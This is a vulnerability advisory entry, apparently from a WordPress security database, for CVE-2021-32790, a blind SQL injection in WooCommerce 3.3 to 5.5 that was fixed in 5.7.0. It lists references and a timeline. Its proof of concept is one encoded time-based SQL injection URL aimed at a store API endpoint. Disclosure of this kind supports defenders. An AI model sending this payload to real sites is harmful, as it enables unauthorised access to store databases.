WordPress Plugin Vulnerabilities

Woocommerce 3.3 to 5.5 - Authenticated Blind SQL Injection

Description

The plugin was reported to be affected by a critical Authenticated Blind SQL Injection vulnerability.

Proof of Concept

http://www.example.com/wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][taxonomy]=a%252522%252529%252520or%252520sleep%25252810.1%252529%252523

Affects Plugins

woocommerce

Fixed in version 5.7.0

References

CVE

CVE-2021-32790

URL

https://woocommerce.com/posts/critical-vulnerability-detected-july-2021/

URL

https://twitter.com/WooCommerce/status/1415442447312764931

URL

https://www.wordfence.com/blog/2021/07/critical-sql-injection-vulnerability-patched-in-woocommerce/

URL

https://noc.org/2021/07/15/serious-sqli-in-woocommerce/

URL

https://blog.wpscan.com/critical-woocommerce-vulnerabilities/

URL

https://github.com/woocommerce/woocommerce/security/advisories/GHSA-7vx5-x39w-q24g

Classification

Type

SQLI

OWASP top 10

A1: Injection

CWE

CWE-89

Miscellaneous

Original Researcher

Josh (jl-dos)

Verified

WPVDB ID

1212fec8-1fde-41e5-af70-abdd7ffe5379

Timeline

Publicly Published

2021-07-15 (about 11 months ago)

Added

2021-07-15 (about 11 months ago)

Last Updated

2022-04-12 (about 2 months ago)

Our Other Services

WPScan WordPress Security Plugin